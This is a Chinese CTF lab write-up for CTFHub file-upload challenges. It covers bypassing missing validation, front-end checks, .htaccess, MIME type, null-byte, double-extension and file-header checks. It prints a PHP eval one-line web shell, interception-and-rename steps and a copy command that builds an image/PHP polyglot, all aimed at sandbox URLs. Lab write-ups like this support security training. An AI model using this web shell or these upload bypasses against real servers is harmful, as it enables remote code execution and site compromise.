ctfhub文件上传

⽆验证

上传⼀句话⽊⻢,发现上传成功

复制代码
1.php ⼀句话⽊⻢内容:
<?php @eval($_POST[cmd]);?>

上传⼀句话⽊⻢,发现上传成功

复制代码
http://challenge-8b27d18368ecc25c.sandbox.ctfhub.com:10800/upload/1.ph
p

前端验证

开启题⽬

上传⼀个 1.jpg,内容是

复制代码
<?php @eval($_POST[cmd]);?>

上传抓包,修改后缀为 php

放包,上传成功

蚁剑连接

复制代码
http://challenge-3c592a81e5b9e7a6.sandbox.ctfhub.com:10800/upload/1.ph
p

在/var/www/html/flag_2925720673.php找到flag

.htaccess

先上传.htaccess

再上传1.jpg

蚁剑连接

注意是1.jpg不是1.php

复制代码
http://challenge-dc29f7e0bd8df3ff.sandbox.ctfhub.com:10800/upload/1.jpg

得到flag

MIME 绕过

上传2.jpg抓包修改为2.php

蚁剑连接

00 截断

上传2.php抓包并修改成如下图所示

蚁剑连接

双写绕过

抓包修改成如下所示

蚁剑连接

⽂件头检测

命令行以管理员身份运行

png照片可截图获得,不可通过改文件后缀获得

且必须在文件所在目录下

复制代码
copy 2.png/b + 2.php/a 3.png

上传3.png并抓包修改

蚁剑连接

相关推荐
网安INF7 小时前
网络杀伤链(CKC模型)与ATT&CK模型详解
网络·安全·网络安全·网络攻击模型
Bruce_Liuxiaowei9 小时前
Nmap+Fofa 一体化信息搜集工具打造
运维·开发语言·网络·网络安全
旧梦吟12 小时前
脚本网站 开源项目
前端·web安全·网络安全·css3·html5
白帽子黑客杰哥13 小时前
网络安全面试指南
web安全·网络安全·面试·渗透测试·面试技巧
xl-xueling14 小时前
从快手直播故障,看全景式业务监控势在必行!
大数据·后端·网络安全·流式计算
小韩博15 小时前
小迪笔记45课之-PHP应用&SQL二次注入&堆叠执行&DNS带外&功能点&黑白盒条件
笔记·sql·网络安全·php
小韩博16 小时前
小迪之盲注第44课
android·网络安全·adb
竹等寒18 小时前
TryHackMe-SOC-Section 3:核心 SoC 解决方案
网络·网络安全
JoStudio18 小时前
白帽系列01: 抓包
java·网络安全
一岁天才饺子19 小时前
文件包含漏洞
网络安全·文件包含